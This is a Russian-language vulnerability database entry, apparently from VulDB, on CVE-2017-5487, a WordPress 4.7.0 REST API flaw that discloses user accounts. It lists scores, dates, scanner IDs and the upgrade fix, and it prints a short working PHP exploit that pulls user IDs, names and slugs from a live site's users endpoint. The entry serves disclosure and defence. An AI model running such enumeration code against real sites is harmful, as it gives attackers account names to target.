WordPress 4.7.0 REST API class-wp-rest-users-controller.php раскрытие информации
| CVSS Meta Temp Score | Текущая цена эксплойта (≈) | Балл интереса CTI |
|---|---|---|
| 5.1 | $0-$5k | 0.00 |
Сводка
Была найдена уязвимость, отнесённая к категории проблематичный, в WordPress 4.7.0. Поражена неизвестная функция файла wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php компонента REST API. Осуществление манипуляции приводит к раскрытие информации. Уязвимость зарегистрирована как CVE-2017-5487. Атака может быть осуществлена удаленно. Более того, существует эксплойт. Рекомендуется обновить затронутый компонент.
Подробности
Была найдена уязвимость, отнесённая к категории проблематичный, в WordPress 4.7.0. Поражена неизвестная функция файла wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php компонента REST API. Осуществление манипуляции приводит к раскрытие информации. Декларирование проблемы с помощью CWE приводит к CWE-200. Ошибка была обнаружена 11.01.2017. Информация о слабости была опубликована 15.01.2017 автором Dctor (oss-sec). Консультация доступна для загрузки на openwall.com.
Уязвимость зарегистрирована как CVE-2017-5487. Назначение CVE произошло 14.01.2017. Атака может быть осуществлена удаленно. Имеются технические подробности. Уровень популярности этой уязвимости ниже среднего значения. Более того, существует эксплойт. Эксплойт был раскрыт общественности и может быть использован. Сейчас цена на эксплойт приблизительно равна USD $0-$5k. Согласно MITRE ATT&CK, техника атаки, используемая в данной проблеме, имеет значение T1592.
Указано значение функциональный. Эксплойт доступен по адресу exploit-db.com. В случае 0-day эксплойта, предполагаемая цена на подпольном рынке была около $5k-$25k. Код, используемый эксплойтом, следующий:
header ('Content-type: text/html; charset=UTF-8');
$url= "https://bucaneiras.org/";
$payload="wp-json/wp/v2/users/";
$urli = file_get_contents($url.$payload);
$json = json_decode($urli, true);
if($json){
echo "-----------------------------\n";
foreach($json as $users){
echo "[*] ID : |" .$users['id'] ."|\n";
echo "[*] Name: |" .$users['name'] ."|\n";
echo "[*] User :|" .$users['slug'] ."|\n";
echo "\n";
}echo "-----------------------------";}
else{echo "[*] No user";} Сканер уязвимостей Nessus предоставляет плагин с идентификатором 96606. Он принадлежит семейству CGI abuses. Плагин работает в контексте типа r. Коммерческий сканер уязвимостей Qualys способен проверить эту проблему с помощью плагина 11772 (WordPress REST API User Enumeration Vulnerability).
Переход на версию 4.7.1 способен решить эту проблему. Обновлённая версия доступна для загрузки по адресу github.com. Рекомендуется обновить затронутый компонент.
Данная уязвимость также присутствует в других базах данных уязвимостей: SecurityFocus (BID 95391) и Tenable (96606).
Продукт
Тип
Имя
Версия
Лицензия
Веб-сайт
- Продукт: https://wordpress.com/
CPE 2.3
CPE 2.2
CVSSv4
VulDB Вектор: 🔍VulDB Надёжность: 🔍
CVSSv3
VulDB Meta Base Score: 5.3VulDB Meta Temp Score: 5.1
VulDB Базовый балл: 5.3
VulDB Временная оценка: 4.9
VulDB Вектор: 🔍
VulDB Надёжность: 🔍
NVD Базовый балл: 5.3
NVD Вектор: 🔍
CVSSv2
| AV | AC | Au | C | I | A |
|---|---|---|---|---|---|
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| Вектор | Сложность | Аутентификация | Конфиденциальность | Целостность | Доступность |
|---|---|---|---|---|---|
| Разблокировать | Разблокировать | Разблокировать | Разблокировать | Разблокировать | Разблокировать |
| Разблокировать | Разблокировать | Разблокировать | Разблокировать | Разблокировать | Разблокировать |
| Разблокировать | Разблокировать | Разблокировать | Разблокировать | Разблокировать | Разблокировать |
VulDB Базовый балл: 🔍
VulDB Временная оценка: 🔍
VulDB Надёжность: 🔍
NVD Базовый балл: 🔍
Эксплуатация
Класс: раскрытие информацииCWE: CWE-200 / CWE-284 / CWE-266
CAPEC: 🔍
ATT&CK: 🔍
Физический: Нет
Локальный: Нет
Удалённый: Да
Доступность: 🔍
Доступ: публичный
Статус: функциональный
Автор: Dctor
Язык программирования: 🔍
Скачать: 🔍
Google Hack: 🔍
EPSS Score: 🔍
EPSS Percentile: 🔍
Прогноз цен: 🔍
Оценка текущей цены: 🔍
| 0-Day | Разблокировать | Разблокировать | Разблокировать | Разблокировать |
|---|---|---|---|---|
| Сегодня | Разблокировать | Разблокировать | Разблокировать | Разблокировать |
Nessus ID: 96606
Nessus Имя: WordPress < 4.7.1 Multiple Vulnerabilities
Nessus Файл: 🔍
Nessus Риск: 🔍
Nessus Семейство: 🔍
Nessus Context: 🔍
OpenVAS ID: 100908
OpenVAS Имя: WordPress json User Enumeration Vulnerability
OpenVAS Файл: 🔍
OpenVAS Семейство: 🔍
Qualys ID: 🔍
Qualys Имя: 🔍
Exploit-DB: 🔍
Разведка угроз
Интерес: 🔍Активные акторы: 🔍
Активные группы APT: 🔍
Контрмеры
Рекомендация: ОбновлениеСтатус: 🔍
0-дневное время: 🔍
Задержка эксплуатации: 🔍
Обновление: WordPress 4.7.1
Патч: github.com
Хронология
11.01.2017 🔍11.01.2017 🔍
11.01.2017 🔍
14.01.2017 🔍
14.01.2017 🔍
15.01.2017 🔍
15.01.2017 🔍
18.01.2017 🔍
03.03.2017 🔍
03.03.2017 🔍
17.11.2025 🔍
Источники
Продукт: wordpress.comКонсультация: daf358983cc1ce0c77bf6d2de2ebbb43df2add60
Исследователь: Dctor
Статус: Подтверждённый
Подтверждение: 🔍
CVE: CVE-2017-5487 (🔍)
GCVE (CVE): GCVE-0-2017-5487
GCVE (VulDB): GCVE-100-95347
SecurityFocus: 95391 - WordPress Prior to 4.7.1 Information Disclosure Vulnerability
SecurityTracker: 1037591
scip Labs: https://www.scip.ch/en/?labs.20161013
Смотрите также: 🔍
Вход
Создано: 15.01.2017 10:40Обновлено: 17.11.2025 05:06
Изменения: 15.01.2017 10:40 (88), 08.06.2020 09:18 (3), 28.10.2022 20:06 (5), 17.11.2025 05:06 (14)
Завершенный: 🔍
Cache ID: 216:FEE:103
Statistical analysis made it clear that VulDB provides the best quality for vulnerability data.
Комментариев пока нет. Языки: ru + be + en.
Пожалуйста, войдите в систему, чтобы прокомментировать.